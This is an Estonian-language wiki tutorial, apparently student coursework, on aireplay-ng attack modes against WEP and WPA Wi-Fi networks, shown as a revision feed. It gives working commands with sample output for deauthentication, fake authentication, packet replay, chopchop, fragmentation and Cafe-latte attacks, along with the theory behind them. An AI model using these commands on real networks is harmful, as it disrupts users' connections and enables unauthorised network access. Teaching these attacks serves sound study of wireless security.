&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* BSSID peab olema sihtmärk AP korrektne MAC aadress[2]&lt;br /&gt;
* kanal peab olema sama millel AP reaalselt räägib[2]&lt;br /&gt;
* STMAC on rünnatava kliendi korrektne MAC aadress[2]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Sending 64 directed&#039;&#039;&#039; - saadeti välja 64 suunatud deautentimise paketti, st. 64 kliendile ja 64 AP&#039;le.[2]&lt;br /&gt;
* &#039;&#039;&#039;61&#039;&#039;&#039; - mitu paketti klient kätte sai[2]&lt;br /&gt;
* &#039;&#039;&#039;63&#039;&#039;&#039; - mitu paketti AP kätte sai[2]&lt;br /&gt;
&lt;br /&gt;
Kui 61 ja 63 on arvud mis on suhteliselt stabiilsed ja lähedal 64&#039;le, siis tähendab see seda et mõlemad osapooled on sinu võrgukaardi antennist kuuldekaugusel ja nendega on võimalik infot vahetada. Kui üks neist numbritest on väike, siis tähendab seda et asud vastavast osapoolest liiga kaugel - sellisel juhul see rünnak ei tööta, sul on vaja kas saatja saatevõimet suurendada, või minna osapoolele füüsiliselt lähemale.[2]&lt;br /&gt;
&lt;br /&gt;
Suunatud &#039;&#039;versus&#039;&#039; broadcast olukorras on alati soovitav kasutada suunatud varianti, kuna paljud kliendid ignoreerivad broadcastis saadetud lahtiühendamise paketti.[2]&lt;br /&gt;
&lt;br /&gt;
Kui sulle kliendi ACK&#039;ide arv tundub korrektne, aga sulle ikkagi ei tundu et ta ennast lahti ühendaks, siis võib probleem peituda selles et ta ühendub uuesti liiga kiiresti.[2]&lt;br /&gt;
&lt;br /&gt;
====Broadcast====&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -0 100 -a AA:AA:AA:AA:AA:AA  mon0&lt;br /&gt;
21:33:25  Waiting for beacon frame (BSSID: AA:AA:AA:AA:AA:AA) on channel 11&lt;br /&gt;
NB: this attack is more effective when targeting&lt;br /&gt;
a connected wireless client (-c &amp;lt;client&#039;s mac&amp;gt;).&lt;br /&gt;
21:33:25  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:26  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:27  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
21:33:28  Sending DeAuth to broadcast -- BSSID: [AA:AA:AA:AA:AA:AA]&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nagu mainitud, &#039;&#039;broadcast&#039;&#039; lahtiühendamine on vähem efektiivsem.&lt;br /&gt;
&lt;br /&gt;
==Rünnak 1: Fake authentication==&lt;br /&gt;
Võlts autentimine lubab läbi viia nii Open System kui ka Shared Key WEP autentimist, peale selle teeb ta ka assotsiatsiooni access pointiga. See on kasulik ainult siis kui sul on vaja AP&#039;le pakettide saatmiseks assotsiaseeritud klienti, selle puudumisel ei võta AP ühtegi talle saadetud pakki vastu. Kui meil on aga reaalne klient, siis saame tema nimel pakke saata, kui pole, on vaja võlts autentimist.&lt;br /&gt;
Võlts autentimine ei tekita ARP pakette(seega ei piisa selle üksi kasutamisest) ja ei suuda assotsiaseeruda WPA/WPA2 access pointidega.[3]&lt;br /&gt;
&lt;br /&gt;
Fake authenticationit ei tohi kasutada aktiivse kliendi MACiga. See on eriti sobilik meetod selliseks juhuks kui olemasolevalt kliendilt on kinni püütud näiteks ARP pakett, ning klient ühendub lahti enne kui suudad piisavalt arp pakette tagasi mängida. Sellisel juhul aitab sama kliendi MACiga fake autentimine ning siis seda kinnipüütud pakki uuesti/edasi mängida.&lt;br /&gt;
&lt;br /&gt;
===Meetodid===&lt;br /&gt;
====Open Authentication====&lt;br /&gt;
Open authentication puhul ei üritata klienti enne assotsiaseerumist autentida, seega saame kerge vaevaga ennast ära assotsiaseeruda ning hakata AP&#039;ga suhtlema. Selles etapis hakkavad tavakliendid WEP&#039;i(ja seega ka salajast võtit) kasutades rääkima, meie aga saame sisestada juba korrektse võtmega krüptitud(reaalselt kliendilt varem püütud) pakke AP&#039;le saatma, uuesti ja uuesti.[4]&lt;br /&gt;
&amp;lt;pre&amp;gt;$ sudo aireplay-ng -1 0 -a AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
21:40:20  Sending Authentication Request&lt;br /&gt;
21:40:20  Authentication successful&lt;br /&gt;
21:40:20  Sending Association Request&lt;br /&gt;
21:40:20  Association successful :-)&lt;br /&gt;
...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Sellisel juhul on assotsiaseerumine õnnestunud võib jätkata teiste rünnakutega - AP võtab vastu vastavalt MACilt tulevaid pakke, ja saadab õigetes tingimustes ka vastuseid.[4]&lt;br /&gt;
&lt;br /&gt;
====Shared Key Authentication====&lt;br /&gt;
SKA tähendab seda, et AP ei räägi potensiaalse kliendiga mitte midagi, va. WEP võtmega autentimise protokoll, seega ei ole võimalik meil AP&#039;ga assotsiaseeruda(me ei tea ju salajast võtit millega autentimisel AP saadetud puzzle ära &amp;quot;lahendada&amp;quot;) ning sellest tulenevalt ei saa me ka AP&#039;le mingeid pakke saata.&lt;br /&gt;
&amp;lt;pre&amp;gt;...&lt;br /&gt;
15:46:53  Sending Authentication Request&lt;br /&gt;
15:46:53  AP rejects open-system authentication&lt;br /&gt;
Please specify a PRGA-file (-y).&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul on vaja kinni püüda SKA &#039;&#039;handshake&#039;&#039; paketid. See toimub automaatselt kui airodump-ng näeb mõnda WEP-SKA handshake&#039;i. Deauthentimise rünnakuga saab seda olemasolevale kliendile sundida.[7]&lt;br /&gt;
&lt;br /&gt;
Kinnipüütud &#039;&#039;handshake&#039;&#039;`id salvestatakse &amp;quot;sharedkey-01-00-14-6C-7E-40-80.xor&amp;quot; formaadis faili. See fail tuleb vastavasse AP&#039;sse fake autentimisel/kliendi disconnectimisks anda kaasa &amp;quot;-y&amp;quot; käsurea argumendiga.[7]&lt;br /&gt;
&lt;br /&gt;
NOTE: Kui airodump-ng jookseb ilma aktiivseid rünnakuid AP pihta tegemata, siis on AUTH väli WEP AP taga tühi. Kui airodump-ng näeb mända handshake&#039;i siis tuleb AUTH välja sisse SKA, samal hetkel salvestatakse ka fail.[7]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 2: Interactive packet replay==&lt;br /&gt;
&lt;br /&gt;
See rünnak lubab valida konkreetse paketti mida taasmängida. Selle meetodiga saab pakette lugeda kahest kohast, võrgust ja failist. Keskendume võrgust püüdmisele.&lt;br /&gt;
Et interaktiivne uuestimängimine töötaks on tähtis veidi alusteadmisi paketivoo kohta. Iga pakett ei tööta selle rünnakuga. Õnnestumine tähendab seda et AP võtab paki vastu ja genereerib uue IV - WEP ründamiseks on vaja ju koguda palju IV&#039;sid.&lt;br /&gt;
Väga kasulik on panna peale ka &amp;quot;-m 68 -n 86&amp;quot; filtrid. Need filtreerivad vastavalt minimaalse paki suuruse(68- traadita klientilt) ja maksimaalse(86- traadiga kliendilt). Need on WEP ühenduses ARP pakettide suurused ning õigesti kasutades peaksid tagama vastuse AP poolt.[8]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Naturaalsed paketid===&lt;br /&gt;
&lt;br /&gt;
Et seda teha, tuleb meil kas taasmängida originaalpaketti, või paketti veidi manipuleerida.  AP&#039;d edastavad(tekitavad uue IV) alati pakkidele mis on suunatud broadcast MACi(FF:FF:FF:FF:FF:FF) vastu. Selline omadus on näiteks ARP pakettidel. Peale selle on vajalik et pakett liiguks traadita kliendist traadiga võrku. Sellisel pakettil on &amp;quot;To DS&amp;quot; lipuke seatud &amp;quot;1&amp;quot; peale.&lt;br /&gt;
Need  filtrid on seadistatavad -b,-d ja -t argumentidega.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -d FF:FF:FF:FF:FF:FF -t 1 mon0&lt;br /&gt;
 Read 4 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 68, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  FF:FF:FF:FF:FF:FF&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 de00 0014 6c7e 4080 000f b534 3030  .A....l~@....400&lt;br /&gt;
      0x0010:  ffff ffff ffff 4045 d16a c800 6f4f ddef  ......@E.j..oO..&lt;br /&gt;
      0x0020:  b488 ad7c 9f2a 64f6 ab04 d363 0efe 4162  ...|.*d....c..Ab&lt;br /&gt;
      0x0030:  8ad9 2f74 16bb abcf 232e 97ee 5e45 754d  ../t....#...^EuM&lt;br /&gt;
      0x0040:  23e0 883e                                #..&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Manipuleeritavad pakid===&lt;br /&gt;
&lt;br /&gt;
Eesmärk, nagu alati, on panna AP genereerima uusi IV&#039;sid. Ainuke vajalik argument on &amp;quot;-t 1&amp;quot; - see selekteerib ainult pakette mis liiguvad etherneti suunas.&lt;br /&gt;
&lt;br /&gt;
Me ei hooli ka mis lõppunkti MAC aadress on, kuna  me saame selle ära muuta.  Selleks on &amp;quot;-p 0841&amp;quot; argument, mis  muudab paki põhimõtte selliseks nagu ta saadetaks kliendist  AP&#039;sse - põmst. muudab &amp;quot;To DS&amp;quot; lipu &amp;quot;1&amp;quot;. Vaja on anda ka &amp;quot;-c&amp;quot; väärtuseks broadcast MAC.[8]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -2 -b AA:AA:AA:AA:AA:AA -t 1 -c FF:FF:FF:FF:FF:FF -p 0841 mon0&lt;br /&gt;
 Read 10 packets...&lt;br /&gt;
 &lt;br /&gt;
      Size: 124, FromDS: 0, ToDS: 1 (WEP)&lt;br /&gt;
 &lt;br /&gt;
           BSSID  =  AA:AA:AA:AA:AA:AA&lt;br /&gt;
       Dest. MAC  =  BB:BB:BB:BB:BB:BB&lt;br /&gt;
      Source MAC  =  CC:CC:CC:CC:CC:CC&lt;br /&gt;
 &lt;br /&gt;
      0x0000:  0841 2c00 0014 6c7e 4080 000f b534 3030  .A,...l~@....400&lt;br /&gt;
      0x0010:  0040 f477 e5c9 90c9 3d79 8b00 ce59 2bd7  .@.w....=y...Y+.&lt;br /&gt;
      0x0020:  96e7 fadf e0de 2e99 c019 4f85 9508 3bcc  ..........O...;.&lt;br /&gt;
      0x0030:  8d18 dbd5 92a7 a711 87d8 58d3 02b3 7be7  ..........X...{.&lt;br /&gt;
      0x0040:  8bf1 69c0 c596 3bd1 436a 9598 762c 9d1d  ..i...;.Cj..v,..&lt;br /&gt;
      0x0050:  7a57 3f3d e13c dad0 f2d8 0e65 6d66 d913  zW?=.&amp;lt;.....emf..&lt;br /&gt;
      0x0060:  9716 84a0 6f9a 0c68 2b20 7f55 ba9a f825  ....o..h+ U...%&lt;br /&gt;
      0x0070:  bf22 960a 5c7b 3036 290a 89d6            .&amp;quot;..\{06)...&lt;br /&gt;
 &lt;br /&gt;
 Use this packet ? y&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Klientideta võrgu ründamine===&lt;br /&gt;
Sellel meetodil on väga huvitav omadus see, et saab rünnata ka traadita-klientideta AP&#039;d. Jooksuta aireplay-d kõige elementaarsemate argumentidega:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -2 -b 00:14:6C:7E:40:80 -d FF:FF:FF:FF:FF:FF -t 1 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nüüd jääb üle vaid oodata kuni mõni pakett broadcasti saadetakse. Pole tähtis milline pakket, sisesta lihtsalt &amp;quot;y&amp;quot; esimesele tulevale pakile ja AP hakkab IV&#039;sid genereerima. Negatiivne külg asjal on tõsiasi et paljud pakid on suhteliselt suured - suured pakid genereerivad IV&#039;sid aeglasemalt. Suur pluss on see et ei ole vaja kinni püüda xor paketistriimi(chopchop või fragmenteeritud rünnakud), ehitada pakki ja käivitada relay rünnakut.[8]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 3: ARP request replay attack==&lt;br /&gt;
Klassikaline ARP päringu taasmängimise rünnak on efektiivseim viis IV&#039;de genereerimiseks, ja ta töötab ka piisavalt stabiilselt. Programm kuulab ARP paketti(tunneb ära kindlate mittekrüptimata väljade järgi ja paki pikkuse järgi) ning hakkab seda AP&#039;le taasmängima. See omakorda põhjustab igale päringu vastusele uue IV genereerimise.&lt;br /&gt;
Seda rünnakut võib lugeda interaktiivse taasmängimise erijuhuks.[9]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$ sudo aireplay-ng -3 -b AA:AA:AA:AA:AA:AA -h CC:CC:CC:CC:CC:CC mon0&lt;br /&gt;
 Saving ARP requests in replay_arp-0001-123456.cap&lt;br /&gt;
 You should also start airodump-ng to capture replies.&lt;br /&gt;
 Read 11978 packets (got 7193 ARP requests), sent 3902 packets...&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Rünnak 4: KoreK chopchop attack==&lt;br /&gt;
See rünnak suudab hea õnne korral dekrüptida WEP paketi ilma salajast võtit teadmata. Meetod võib töötada isegi dünaamilise WEP vastu. See rünnak ei tagasta sulle WEP salajast võtit, vaid paketi sisu ja selle paketi krüptimiseks kasutatud keystreami. Mõned AP&#039;d ei ole sellele rünnakule avatud. Kui AP dropib pakke mille pikkus on alla 42 baidi, siis aireplay üritab ülejäänud baidid ära arvata - edukuse tõenäosus oleneb headerite ennustusvõimest. Kui püütakse kinni IP pakett, siis tehakse lisaks veel checksum kontroll peale arvatava lisabaitide juurdelisamist. Rünnakuks on vaja vähemalt ühte WEP paketti.[10]&lt;br /&gt;
&lt;br /&gt;
===Teooria===&lt;br /&gt;
KoreK kasutab hästituntud nõrga ICV[link] probleemi ja järeldab sellest, et kui pakki lühendada ühe baidi võrra, siis saab sellest ehitada uue korrektse paki, kuna uus ICV on otseselt seotud puuduva krüptimata baidiga. [11]&lt;br /&gt;
&lt;br /&gt;
Esimene samm on võtta püütud pakett (M) ja eemaldada viimane bait, et saada sõnum M-1. Kuna me ei tea eemaldatud baidi &#039;&#039;plaintekst&#039;&#039; väärtust, peame hakkama seda arvama. Õnneks on ainult 256 võimalikku baidiväärtust. Esmaks eeldame siis et eemaldatud bait oli 0x00 ja paneme saadud sõnumi valemisse(liiga mahukas et siin kirjeldada), et luua abitmask mis üritab muuta ebakorrektset M-1 paketti valiidseks M-1 paketiks. Siis proovime paki korrektsust pritsides selle võrku. Kui AP selle kätte saab, siis kontrollitakse seda ja vastavalt aksepteeritakse või ignoreeritakse. Iga saadetud pakk baseerub arvataval baidil, niiet tõenäosus õige olla on 1/256. Kui pakett on aga õige, siis AP valideerib selle ja edastab võrku. Eeldades et sa samal ajal kuulad võrku saad näha kui AP seda teeb. Sellisel juhul tead mis on paki viimane bait. Siis on võimalik arvutada PRGA väärtus mida kasutati selle plaintekst baidi krüptimiseks(P XOR M = RC4 PRGA). Ühesõnaga, ründaja saab bait baidi haaval kogu paketi niimoodi ära arvata, boonuseks on ka keystream millega saad oma paki luua.[11]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt; .........&lt;br /&gt;
 Offset   38 (90% done) | xor = FD | pt = 08 |  229 frames written in   688ms&lt;br /&gt;
 Offset   37 (92% done) | xor = 13 | pt = 01 |  232 frames written in   695ms&lt;br /&gt;
 Offset   36 (94% done) | xor = 83 | pt = 00 |   19 frames written in    58ms&lt;br /&gt;
 Offset   35 (96% done) | xor = 4E | pt = 06 |  230 frames written in   689ms&lt;br /&gt;
 Sent 957 packets, current guess: B9...&lt;br /&gt;
 &lt;br /&gt;
 The AP appears to drop packets shorter than 35 bytes.&lt;br /&gt;
 Enabling standard workaround: ARP header re-creation.&lt;br /&gt;
 &lt;br /&gt;
 Saving plaintext in replay_dec-0201-191706.cap&lt;br /&gt;
 Saving keystream in replay_dec-0201-191706.xor&lt;br /&gt;
 &lt;br /&gt;
 Completed in 21s (2.29 bytes/s)&amp;lt;/pre&amp;gt;&lt;br /&gt;
Jee! Saad kasutada xor faili oma paki injectimiseks või lugeda paki sisu .cap failist. Vaata ainult et paki injectimisel kasutad autentitud source maci, väga väheste ruuterite korral töötab paki sisestamine &#039;&#039;broadcasti&#039;&#039; ilma autentimata. Soovitatav on võtta ka lühem pakett kuna dekrüptimise aeg on lineaarselt seotud paketi pikkusega.[10]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 5: Fragmentation attack==&lt;br /&gt;
Õnnestumise korral suudab see rünnak tagastada sulle kuni 1500 baiti PRGA&#039;d. See rünnak ei tagasta WEP võtit. Saadud PRGA&#039;ga saab krüptida oma loodud pakette ja neid võrku injectida. Ründamiseks on vaja saada AP&#039;lt vähemalt üks pakett.[12]&lt;br /&gt;
&lt;br /&gt;
Põhimõtteliselt saab programm paketist väikese hulga võtmematerjali ning üritab saata ARP või LLC pakette(kuna selliste pakettide sisu on teada) AP&#039;le. Kui pakett kajatakse tagasi AP poolt siis saab tagastatud paketi põhjal tuletada suurema hulga PRGA baite. Tsüklit saab korrata kuni saadakse kätte kuni 1500 baiti.[12]&lt;br /&gt;
&lt;br /&gt;
See rünnak nõuab head ühendust AP&#039;ga, kuna ründaja fragmenteerib pakette ja AP peab need kõik kätte saama.[12]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Saving chosen packet in replay_src-0124-161120.cap&lt;br /&gt;
 Data packet found!&lt;br /&gt;
 Sending fragmented packet&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 384 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Trying to get 1500 bytes of a keystream&lt;br /&gt;
 Got RELAYED packet!!&lt;br /&gt;
 Thats our ARP packet!&lt;br /&gt;
 Saving keystream in fragment-0124-161129.xor&lt;br /&gt;
 Now you can build a packet with packetforge-ng out of that 1500 bytes keystream&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ja meil ongi olemas .xor fail millega saab &#039;&#039;custom&#039;&#039; pakette injectida. Muidugi on vajalik assotsiaseeritud klienti kelle nimelt pakette injectida.[12]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 6: Cafe-latte attack==&lt;br /&gt;
Iga WEP klient kes saab ARP päringu vastab sellele automaatselt korrektselt krüptitud ARP vastustega - selle etapini jõudmiseks ei pea AP tõestama et ta WEP võtit teab.&lt;br /&gt;
Selle rünnakuga saab kinnipüütud paketis pöörata ümber mõned bitid mille käigus pööratakse kliendi ARP päring ta enda poole tagasi. Saates võltsitud ARP päringut kliendile korduvalt saame kinni püüda suurel hulgal korrektseid krüptitud ARP vastuseid.[13]&lt;br /&gt;
&lt;br /&gt;
See rünnak töötab kuna WEP ei ole nõrk mitte ainult statistilise analüüsi rünnakute vastu, vaid tal puudub ka krüptograafilise tugevusega paki terviklikkuse kontroll.&lt;br /&gt;
Lühidalt öeldes ei suuda osapooled eristada võltsitud/modifitseeritud paketti korrektsest pakist.[13]&lt;br /&gt;
&lt;br /&gt;
Iga WEP pakett kasutab CRC checksumi ülekande vigade tuvastamiseks. Ammu aga teatakse et ründaja saab muuta nii paki sisu kui ka CRC&#039;d et luua uus korrektne pakk. Cafe-latte kasutab neid nõrkusi ja muudab ära saatja MACi ja saatja IP aadressi mis sisalduvad kliendi ARP päringus ning suunavad need kliendi vastu.[13]&lt;br /&gt;
&lt;br /&gt;
Kuna klient ei suuda võltsingut eristada, vastabki ka igale päringule.[13]&lt;br /&gt;
&lt;br /&gt;
===Kasutamine===&lt;br /&gt;
Seda rünnakut saab kasutada reaalsest võrgust eraldatud kliendi puhul. Kliendid teevad tuntud võrkude otsimisel PROBE päringuid, millele saab ründaja siis fake APga vastata. Sellisel juhul peaks kasutama &amp;quot;-D&amp;quot; argumenti et lülitada välja AP otsimine.[14]&lt;br /&gt;
&lt;br /&gt;
==Rünnak 7: Client-oriented fragmentation attack==&lt;br /&gt;
Selle rünnakuga saab kasutada suvalist IP või ARP paketti. See laiendab Cafe-Latte rünnakut lubades kasutada suvalist paketti kliendilt.&lt;br /&gt;
Sellest paketist peame genereerima ARP päringu. ARPil peab asuma baidipositsioonil 33 sihtmärgi IP ning sihtmärgi MAC peab olema nullbaidi jada.&lt;br /&gt;
Praktikas võib sihtmärgi MAC olla aga suvaline väärtus.[15]&lt;br /&gt;
&lt;br /&gt;
Saadud pakis on teada koht kus asub lähtepunkti IP aadress - bait 23 ARP puhul ja 21 IP puhul. Eeldatakse et pakk on ARP kui paki suurus on 68 või 86 baiti, vastaseljuhul eeldatakse et on IP pakett.[15]&lt;br /&gt;
&lt;br /&gt;
===ARP===&lt;br /&gt;
Korrektse ARP päringu saatmiseks kliendile peame liigutama lähtekoha IP aadress positsioonile 33. Muidugi ei saa seda niisama lihtsalt teha - pakk ei valideeruks. Selle vastu kasutame aga paketi fragmenteerimist. ARP saadetakse kliendile kahe fragmendina. Esimese fragmendi pikkus valitakse niimoodi et paketi kokkupanemisel kliendi poolt satuks lähtekoha(kliendi) IP positsioonile 33(sihtmärk). Teine fragment on pakett mis kliendilt alguses saadi.[15]&lt;br /&gt;
&lt;br /&gt;
===IP===&lt;br /&gt;
IP paketi puhul kasutatakse sarnast meetodit. Aga kuna PRGA materjali on vähem, siis saadetakse välja kolm fragmenti pluss algne pakk.[15]&lt;br /&gt;
&lt;br /&gt;
Igaljuhul kasutatakse CRC korrektsuse säilitamiseks &#039;&#039;bit flippingut&#039;&#039;. Sama meetodit kasutatakse ka ARP paketi lähtekoha MAC&#039;i muutmiseks juhul kui seal on algselt &#039;&#039;multicast&#039;&#039;.[15]&lt;br /&gt;
&lt;br /&gt;
=Viited=&lt;br /&gt;
[1] http://www.aircrack-ng.org/doku.php?id=aireplay-ng&lt;br /&gt;
&lt;br /&gt;
[2] http://www.aircrack-ng.org/doku.php?id=deauthentication&lt;br /&gt;
&lt;br /&gt;
[3] http://www.aircrack-ng.org/doku.php?id=fake_authentication&lt;br /&gt;
&lt;br /&gt;
[4] https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy&lt;br /&gt;
&lt;br /&gt;
[5] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-08.html&lt;br /&gt;
&lt;br /&gt;
[6] http://documentation.netgear.com/reference/sve/wireless/WirelessNetworkingBasics-3-09.html&lt;br /&gt;
&lt;br /&gt;
[7] http://www.aircrack-ng.org/doku.php?id=shared_key&lt;br /&gt;
&lt;br /&gt;
[8] http://www.aircrack-ng.org/doku.php?id=interactive_packet_replay&lt;br /&gt;
&lt;br /&gt;
[9] http://www.aircrack-ng.org/doku.php?id=arp-request_reinjection&lt;br /&gt;
&lt;br /&gt;
[10] http://www.aircrack-ng.org/doku.php?id=korek_chopchop&lt;br /&gt;
&lt;br /&gt;
[11] http://www.informit.com/guides/content.aspx?g=security&amp;amp;seqNum=197&lt;br /&gt;
&lt;br /&gt;
[12] http://www.aircrack-ng.org/doku.php?id=fragmentation&lt;br /&gt;
&lt;br /&gt;
[13] http://www.wi-fiplanet.com/tutorials/article.php/10724_3716241_2&lt;br /&gt;
&lt;br /&gt;
[14] http://www.aircrack-ng.org/doku.php?id=cafe-latte&lt;br /&gt;
&lt;br /&gt;
[15] http://www.aircrack-ng.org/doku.php?id=hirte&lt;br /&gt;
&lt;br /&gt;
[[Category:Traadita_side_alused]]&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32791</id>
		<title>Aireplay-ng ründerežiimid</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aireplay-ng_r%C3%BCndere%C5%BEiimid&amp;diff=32791"/>
		<updated>2011-05-24T18:59:58Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Manipuleeritavad pakid */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Autor=&lt;br /&gt;
Tanel Liiv D22 (2011)&lt;br /&gt;
&lt;br /&gt;
=Sissejuhatus=&lt;br /&gt;
&lt;br /&gt;
Aireplay-ng`d kasutatakse &#039;&#039;frame&#039;&#039;`de sisestamiseks võrguliiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
Peamine funktsioon on liikluse genereerimine hilisemaks kasutamiseks aircrack-ng`s - [https://secure.wikimedia.org/wikipedia/en/wiki/Wired_Equivalent_Privacy WEP] ja [https://secure.wikimedia.org/wikipedia/en/wiki/WPA-PSK WPA-PSK] võtmete lahtimurdmiseks. Erinevad rünnakuviisid võimaldavad tekitada deautentimist WPA &#039;&#039;handshake&#039;&#039; pakettide püüdmiseks, võlts deautentimiseks, interaktiivseks pakettide taasmängimiseks ja käsitsi valmistatud ARP päringute sisestamiseks liiklusesse.[1]&lt;br /&gt;
&lt;br /&gt;
=Eelteadmised=&lt;br /&gt;
WEP ja WPA/WPA2 võrkude ründamiseks on vajalikud mõned konkreetsed eelteadmised. Nende teadmine lihtsustab suurel määral võimalike probleemide lahendamist ja annab paremini aimu millega tegu on ja kuidas asjad &#039;&#039;backendis&#039;&#039; töötavad - ei teki näiteks viga kus üritatakse taasmängida paketti kui ühtegi klienti pole APga assotsiaseerunud.&lt;br /&gt;
&lt;br /&gt;
Samuti eeldatakse et teatakse aireplay-ng põhikäske ja argumente - nullist õppimiseks ei ole see mõeldud.&lt;br /&gt;
&lt;br /&gt;
==WEP==&lt;br /&gt;
WEPi ründamiseks on vaja eristada Open Authentication ja Shared Key Authentication süsteemi&lt;br /&gt;
===Open Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationOpen.jpg][5]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimis päringu AP&#039;le.[5]&lt;br /&gt;
* AP autentib kliendi.[5]&lt;br /&gt;
** AP laseb selles etapis kõik kliendid läbi, st. mingit autentimist(sõna otseses mõttes) ei toimu[5]&lt;br /&gt;
* Klient assotsiaseerub AP&#039;ga ja liitub võrguga.[5]&lt;br /&gt;
** Selles etapis hakkavad mõlemad osapooled andmeid saatma WEPi krüpteeringuga, st. edasiseks suhtlemiseks on vaja teada salajast võtit. Sellesse punkti jõudes on võimalik assotsiaseerunud kliendi MACiga saata AP&#039;le pakette(nõrkus).[5]&lt;br /&gt;
&lt;br /&gt;
===Shared Key Authentication===&lt;br /&gt;
[http://documentation.netgear.com/reference/sve/wireless/images/WEPauthenticationShared.jpg] [6]&lt;br /&gt;
&lt;br /&gt;
* Klient saadab autentimise päringu AP&#039;le.[6]&lt;br /&gt;
* AP saadab kliendile &#039;&#039;random&#039;&#039; baidijada(ülesanne).[6]&lt;br /&gt;
* Klient kasutab oma 64- või 128bitist salajast võtit ning krüptib saadud baidijada ära, ning saadab tagasi AP&#039;le.[6]&lt;br /&gt;
* AP dekrüptib saadud jada ning võrdleb seda esialgu väljasaadetud stringiga, kui need ei kattu, siis saadetakse kliendile negatiivne vastus. Kui kattub siis järelikult on kliendil ja AP&#039;l sama WEP võti, ning AP autentib kliendi ära.[6]&lt;br /&gt;
* Klient ühendub võrku.[6]&lt;br /&gt;
&lt;br /&gt;
Sellisel juhul ei ole võimalik autentimisest edasi saada ilma võtmeta, ning seega ei saa ka AP&#039;le pakke võrku sisestada. (Lahendus probleemile on #Shared Key Authentication artikli all)&lt;br /&gt;
&lt;br /&gt;
=Meetodid=&lt;br /&gt;
Meetodite pealkrijade ees on &amp;quot;Rünnak x:&amp;quot;. x tähistab numbrit mitmes implementeeritud rünnak see on ja seda numbrit aksepteerib aireplay-ng ka vastava käsurea lipu argumendina.&lt;br /&gt;
==Rünnak 0: Deauthentication==&lt;br /&gt;
&lt;br /&gt;
See meetod saab disassotsiaseerumise paketi ühele või rohkemale kliendile kes on parasjagu vastava &#039;&#039;access pointiga&#039;&#039; assotsiaseerunud. Klientide lahtiühendamisel võib olla mitu eesmärki:[2]&lt;br /&gt;
&lt;br /&gt;
* Peidetud ESSID kättesaamine. See on ESSID mida access point ei kuuluta &#039;&#039;broadcastis&#039;&#039;.[2]&lt;br /&gt;
* WPA/WPA2 handshake kinnipüüdmine sundides klienti uuesti autentima.(Ei ole kohustuslik, võib oodata ka kuni klient ise uuesti ühendub)[2]&lt;br /&gt;
* ARP päringute genereerimine(Windowsi kliendid võivad mõnikord oma ARP &#039;&#039;cache&#039;&#039; tühjendada kui ühendus ära kaob)[2]&lt;br /&gt;
&lt;br /&gt;
NB! Arusaadavalt on see rünnak täiesti kasutu kui traadita ühenduspunkti küljes ei ole ühtegi reaalset assotsiaseerunud klienti või võlts autentitud klienti.[2]&lt;br /&gt;
